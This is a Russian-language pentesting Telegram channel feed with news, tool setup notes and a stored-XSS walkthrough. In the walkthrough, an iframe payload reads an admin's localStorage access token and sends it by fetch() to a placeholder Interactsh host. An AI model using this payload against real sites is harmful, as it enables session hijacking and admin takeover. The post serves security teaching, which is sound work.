Fail Auth
160 subscribers
44 photos
22 links
На этом канале я буду делиться своими открытиями, инсайтами из мира информационной безопасности и инструментами для пентеста.

Связаться со мной: @konstanto0

Offensive security | Rad Cop
https://radcop.online/
https://t.iss.one/radcop_online
Download Telegram
МВД РФ сообщило, что после ограничения звонков в мессенджерах Telegram и WhatsApp (Meta, признана экстремистской и запрещена в РФ) мошенники массово переключились на сервис Google Meet 📞.

Google Meet резко вырос в популярности и занял второе место среди бесплатных приложений в App Store .

По данным ведомства, количество звонков с международных номеров через сотовую связь выросло до 83% 📈, но главным каналом для связи с жертвами стал именно Google Meet. Также преступные группы тестируют FaceTime и мессенджер Max.

Мошенники быстро адаптируются: их кол-центры, базы и схемы не могут простаивать. Интерес к Google Meet объясняется его распространенностью (предустановлен на большинстве Android-смартфонов 📱) и сложностью расследований — оперативно получить данные у Google практически невозможно 🔒.
1👍1🥴1🌚1🍌1🤨1🤓1👀1🤪1🙊1
Forwarded from RAD COP
Как защитить бизнес от хакеров, шифровальщиков, утечек и потери работоспособности

3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или, как принято говорить в отечественных стандартах, тестирования на проникновение).

🎙 Вебинар пройдет в формате диалога, будет наполнен практическими кейсами и инсайтами.

Вебинар поможет заинтересованным участникам найти свой ответ на вопрос: зачем нужна информационная безопасность, как устроены распространенные хакерские атаки и что можно сделать, чтобы не пополнить ряды тех, кто был «зашифрован», столкнулся с утечкой персональных данных клиентов или привлек внимание правоохранительных органов.

↕️Что обсудим:

— Краткий ликбез по ключевым терминам, ИТ и ИБ концепциям, которые определяют контекст хакерских атак и их последствий для собственников, государства, пользователей/клиентов/сотрудников;
— Уязвимости API и логики работы веб-приложений, которые статистически часто лежат в основе успешных атак и приводят к утечкам данных, нарушениям работоспособности организаций;
— Социальную инженерию, сценарии которой задействованы в половине корпоративных атак, включая целевой фишинг и мошенничество с установлением физического контакта с жертвой;
— Защищённость внутреннего периметра: локальная сеть и инфраструктура организации, которые могут быть недоступны извне, и в атаках на которые часто играют свою роль инсайдеры и безалаберные сотрудники с удаленным доступом;
— Первопричины и риски, которые стоят за этими уязвимостями, как через подход «люди-процессы-технологии» можно приоритезировать соответствующие задачи, и в чем сходство управления уязвимостями и тайм-менеджмента.

⚙️ Вы научитесь:

— Базовым терминам и ключевым концепциям ИТ и ИБ необходимым для понимания проблематики компьютерных атак;
— Распознавать ключевые уязвимости и их первопричины;
— Оценивать риски, которые несут конкретные сценарии атак;
— Выстраивать внутренние процессы, чтобы снизить уязвимость и повысить устойчивость.

🤝 Кому полезен вебинар:

Техническим специалистам блоков ИТ и ИБ, топ-менеджменту и собственникам организаций, иным лицам интересующимся в информационной безопасности, которые хотят лучше разбираться в проблематике хакерских атак, рисков, в сценариях нападения и методологии выстраивания защиты через приоритезацию и управление.

Дата и время: 3 сентября 17.00

Ссылка для регистрацииhttps://my.mts-link.ru/j/tmliga/2728011485

Присоединяйтесь, если готовы трансформировать проблемы в преимущества ваших организаций вместе с РАД КОП 🤝

#Вебинар #Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2👨‍💻1
📱 Пентест мобильных приложений всегда начинается с правильной настройки перехвата трафика.

Без прокси-туннеля между устройством и сервером невозможно полноценно анализировать взаимодействие клиента с бэкендом. Поэтому первым шагом всегда идет конфигурация окружения для работы через BurpSuite, mitmproxy или Caido.

Процесс стандартный: приложение на телефоне должно отправлять весь сетевой трафик через прокси. Для этого указываем IP-адрес машины с установленным инструментом и порт прослушивания. Следующий обязательный этап — установка и доверие корневого сертификата прокси на мобильном устройстве. Это позволяет расшифровывать HTTPS-трафик и работать с ним так же, как при классическом тестировании веб-приложений.

После успешной настройки открывается возможность контролировать весь обмен данными: видеть запросы, редактировать параметры, проверять работу авторизации и API, отслеживать обработку токенов и сессий. Именно на этой точке пентестер получает полный обзор коммуникации между клиентом и сервером, что делает возможным дальнейший поиск уязвимостей.

⚠️ На практике часто встречается SSL Pinning — когда приложение не доверяет сторонним сертификатам и отказывается работать через прокси. В таких случаях необходимо обходить защиту: использовать патчинг приложения (например, через Frida или Objection), либо динамически подменять функции проверки сертификатов. Этот шаг иногда требует больше времени, но без него полноценный анализ просто невозможен.

Таким образом, настройка перехвата трафика — это не просто техническая деталь, а фундаментальный этап, без которого дальнейший анализ мобильного приложения невозможен.

📚 Подробные руководства по настройке перехвата трафика можно найти в документации:
» PortSwigger (BurpSuite)
» Mobile Testing Guide проекта OWASP MASTG
Эти материалы детально разбирают как базовые настройки, так и типовые проблемы, возникающие при работе с современными приложениями.
8👍3🔥2
Разработчики представили Kali Linux 2025.3 — третий релиз текущего года, в котором появились 10 новых инструментов, поддержка Nexmon и улучшения NetHunter.
Nexmon представляет собой фреймворк для патчинга прошивок Wi-Fi чипов Broadcom и Cypress, который позволяет включать режим мониторинга и осуществлять инъекции фреймов. Кроме того, в этом релизе ряд обновлений получили Kali NetHunter (включая поддержку Samsung S10) и Kali NetHunter Car Hacking (включая обновленный UI и множество исправленных багов). Также команда Kali пообещала в будущем выпустить видео о том, как использовать CARsenal, с наглядной демонстрацией различных возможностей.

⚙️ Что касается новых инструментов, в Kali Linux 2025.3 их насчитывается десять:
Caido / Caido-cli — полноценный десктоп + серверная часть для web-аудита
Detect It Easy (DiE) — определение форматов PE, ELF и др.
Gemini CLI — опенсорс агент ИИ в терминале
krbrelayx — атаки Kerberos relay + abuse unconstrained delegation
ligolo-mp — мультипользовательский пивотинг
llm-tools-nmap — nmap через LLM
mcp-kali-server — настройка MCP-сервера
patchleaks — анализ патчей и поиск свежих CVE
vwifi-dkms — фейковые Wi-Fi сети


📄 Среди других изменений и улучшений в этой версии можно перечислить:
плагин VPN IP panel в Xfce теперь дает возможность выбрать отслеживаемый интерфейс для удобного копирования IP-адреса VPN-соединения в буфер обмена;
Kali прекращает поддержку ARMel (Acorn RISC Machine, Little-Endian);
появилась возможность устанавливать модули ядра с Magisk, но разработчики предупреждают, что пока это экспериментальная версия.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥52👍2
🕵‍♂️
Всем привет!

Довольно часто на проектах попадается Microsoft Outlook Web Access (OWA).
Столкнулся с проблемой установки инcтрумента PEAS, который помогает протестировать ActiveSync (EAS).
EAS - протокол Microsoft для синхронизации мобильных устройств с Exchange Server.
Утилита устарела, написана под Python 2 и требует ручной правки зависимостей.

В итоге решил проблему с помощью docker.

💻 Установка:
git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m
python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate


🐳 Создаем Dockerfile внутри директории рядом с файлом requirements.txt
FROM python:2.7-slim

RUN sed -i 's|deb.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
sed -i 's|security.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
apt update && \
apt install -y git build-essential libxml2-dev libxslt1-dev libffi-dev libssl-dev

RUN git clone https://github.com/snovvcrash/peas /opt/peas
WORKDIR /opt/peas

RUN pip install -r requirements.txt

ENTRYPOINT ["python", "-m", "peas"]


⚙️ Собираем через команду:
sudo docker build -t peas-py2 .


✔️ Запуск и работа с утилитой:
sudo docker run --rm --net=host -v "$PWD/peas-out":/opt/peas/out peas-py2 -u 'DOMEN\test' -p 'Password123' example.com --list-unc='\\DC-name\' --check


Надеюсь, кому-то пригодится! 💻
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🏆2👨‍💻1😎1
🕵‍♂️ Белых хакеров в России хотят взять под контроль ФСБ

По данным РБК, обсуждается новая версия законопроекта о госрегулировании деятельности white-hat'ов. Основное:

🔸 Вводится термин "мероприятие по поиску уязвимостей", под который попадают:
— публичные bug bounty-программы;
— внутренние bug bounty;
— любые независимые исследования;
— пентесты по договорам.


🔸 Что планируют?
— Создание реестра сертифицированных исследователей;
— Идентификация и аккредитация всех white-hat'ов;
— Жёсткие правила обработки и передачи уязвимостей;
— Обязательное уведомление не только владельца ресурса, но и силовые ведомства;
— Работа вне аккредитованных площадок — под запретом.


🔸 Мнение рынка:
— Реестр = деанонимизация → угроза для безопасности исследователей.
— Падение числа участников bug bounty.
— Псевдонимы — не про “анонимность”, а про риски.


🔸 Поправка в УК (ст. 274): передача сведений об уязвимостях с нарушением установленных правил может квалифицироваться как противоправное деяние.

🔸 Кто будет контролировать?
ФСБ, ФСТЭК, НКЦКИ — полное регулирование.

🔸 Минцифры: законопроект «ещё может меняться», министерство "в диалоге".
Please open Telegram to view this post
VIEW IN TELEGRAM
🥴3👨‍💻21👍1🔥1🥰1😎1
Отличный доклад от коллеги о системе «12-недельный год». Сейчас применяю этот подход — он помогает не просто быстро, а реально двигаться к целям и видеть ощутимые результаты уже за 12 недель, не растягивая всё на год. Рекомендую всем, кто хочет прокачать эффективность, фокус и дисциплину.
🔥42👍1🏆1
ZeroNights 2025 начала публиковать программу — уже можно посмотреть описания докладов Offensive и SecOps треков.

DisTrolles. Мал контейнер, да дорог — про плюсы и минусы перехода на distroless-образы и реальные рекомендации по внедрению.

Плагины атакуют! — разбор кейсов, когда вредоносные расширения попадали в Visual Studio Code Marketplace несмотря на проверки.

Охота на IDOR-ов — как автоматизировать поиск сложных проблем авторизации в больших API.

Программу можно посмотреть здесь: ZeroNights 2025
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍2🏆2
HTML Injection → Stored XSS → Hijack accessToken

Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.

Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.

Решил проверить — вставил простой HTML:
<h1>Test</h1>    <!-- изменение размера шрифта -->

Текст стал крупнее — значит innerHTML или подобная конструкция.

Далее потестировал теги:
<img src="x">    <!-- битая картинка -->
<input> <!-- лишний input на странице -->


Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу ➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS?

➡️ Рабочий XSS-пэйлоад:
<iframe src="javascript:alert(localStorage.accessToken)"></iframe>

В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.

➡️ Эскалация XSS:
<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>

Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.

➡️ Особенность уязвимости теги:
🔴Инъекция сохраняется в БД (Stored)
🔴Отрабатывает на стороне администратора
🔴Через XSS читается accessToken из localStorage


➡️ Что это даёт:
🔴Захват токена администратора
🔴Возможность делать запросы от его имени
🔴Потенциальный full access к admin-панели


➡️ Советы для тестирования:
🔴 Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)
🔴 Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React
🔴Тестируйте на img, input, iframe, svg, math, script и template
🔴 Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location
🔴 Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😁211🔥1👏1🏆1👨‍💻1
Коллеги, всем привет! Благодарю каждого, кто следит за каналом!

Поздравляю с наступающим. Желаю вам фокуса, тишины вокруг и чёткого понимания, куда вы идёте.
Пусть в новом году в отчётах будет больше high severity, а в жизни — больше спокойствия.

Приятно видеть, что нас становится больше. Двигаемся дальше по делу.
8🎅2🎄2